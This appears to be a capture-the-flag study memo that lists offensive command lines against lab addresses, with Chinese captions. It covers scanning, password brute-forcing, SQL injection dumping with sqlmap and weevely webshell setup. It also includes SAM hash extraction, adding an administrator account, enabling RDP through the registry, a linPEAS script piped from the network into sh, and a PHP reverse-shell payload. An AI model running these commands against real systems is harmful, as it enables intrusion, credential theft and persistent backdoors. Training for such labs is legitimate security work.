CTF Memo

nmap

網路設備及服務掃描

sudo nmap 10.10.10.16  //1000 port
sudo nmap 10.10.10.16 -p-  //1-65535 port
sudo nmap 10.10.10.16 -sU -p53,139,161,1900,5353  //UDP port
sudo nmap 10.10.10.16 -p80 --reason  //REASON
sudo nmap 10.10.10.16 -p80 --open  //display only open port ip
sudo nmap 10.10.10.16 -O  //OS
sudo nmap 10.10.10.16 -sV  //VERSION
sudo nmap 10.10.10.16 -sVC -p445,3389  //VERSION + NSE
sudo nmap 10.10.10.* -sU -p161 --open  //SNMP
sudo nmap 10.10.10.16 -sU -p161 -sC  //使用 NSE 預設腳本
sudo nmap 10.10.10.16 -sU -p161 --script snmp-win32-users  //user account

snmp-check

SNMP 設備列舉

sudo snmp-check 10.10.10.16

nbtscan

NetBOIS 掃描

sudo nbtscan 10.10.10.1-254

hydra

破密工具

hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst smb://10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst ftp://10.10.10.16
hydra -l king -P /usr/share/wordlists/nmap.lst rdp://10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst 10.10.10.16 telnet

enum4linux

列舉Windows訊息

sudo enum4linux -u king -p 'slave' -a 10.10.10.16

crackmapexec

網域滲透工具 python3 -m pip install --upgrade impacket (更新)

sudo crackmapexec smb 10.10.10.16 -u king -p 'slave' --shares

net

net use \\10.10.10.16 slave /u:king
net view \\10.10.10.16
net user queen /add
net users
net localgroup Administrator queen /add
net localgroup Administrators

reg add

新增機碼

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netstat

網路狀態

netstat -an | findstr :3389

sqlmap

SQL檢測注入工具

sudo sqlmap -u "https://url" --cookie="<COOKIE>" --dbs
sudo sqlmap -u "https://url" --cookie="<COOKIE>" -D DB_name --tables
sudo sqlmap -u "https://url" --cookie="<COOKIE>" -D DB_name -T Table_name --columns --technique=B
sudo sqlmap -u "https://url" --cookie="<COOKIE>" -D DB_name -T Table_name --dump --technique=B
sudo sqlmap -u "https://url" --forms --crawl=2 -dbs

weevely

Webshell

weevely generate king backdoor.php  //生成
weevely http://ip:port/backdoor.php king  //連接

wpscan

WordPress安全性掃描工具

wpscan --url http://url -e u  //列舉使用者
wpscan --url http://url -P /usr/share/wordlists/nmap.lst  //破密

pwdump

reg save hklm\sam pwdump\sam
reg save hklm\system pwdump\system
impacket-secretsdump LOCAL -system pwdump/system -sam pwdump/sam -outputfile pwdump/10.10.10.10
ophcrack (執行程式破密)

john

破密工具

john secret.txt --format=raw-md5

aircrack

aircrack-ng WEPooo.cap
aircrack-ng WPA2ooo.cap -w /usr/share/wordlists/nmap.lst

linPEAS

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Android

nmap -p5555 10.10.10.* --open
sudo apt install -y adb
adb connect 10.10.10.20:5555
adb devices
adb shell
adb pull /system/app/cindy.apk E:\Cindy\  //get file

impacket upgrade

python3 -m pip install --upgrade impacket

gzip

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

snow

snow -C -p pass -m "message" text1.txt text2.txt
snow -C -p pass text2.txt text3.txt

mount

apt install nfs-common
showmount -e 10.10.10.20
mount -t nfs 10.10.10.20:/home /mnt/nfs
mount -t cifs //10.10.10.20/C$ /mnt/smb -o username=king,password=slave

smbclient

smbclient -U "kingdom\king"  //10.10.10.20/C$

others

njRAT         //trajon
SNOW          //space
OpenStego     //picture
HashMyFiles
VeraCrypt
CrypTool
ophcrack
dir xxx.xxx /s/a/p   //find files
visudo
git clone https://github.com/ly4k/PwnKit.git    //CVE-2021-4034
https://github.com/horsicq/DIE-engine/releases  //DIE
nikto -h http://url -Tuning x -o results -F txt
https://highon.coffee/blog/nikto-cheat-sheet/
https://crackstation.net/
https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap
service rpcbind start
set PAYLOAD php/reverse_php

License

MIT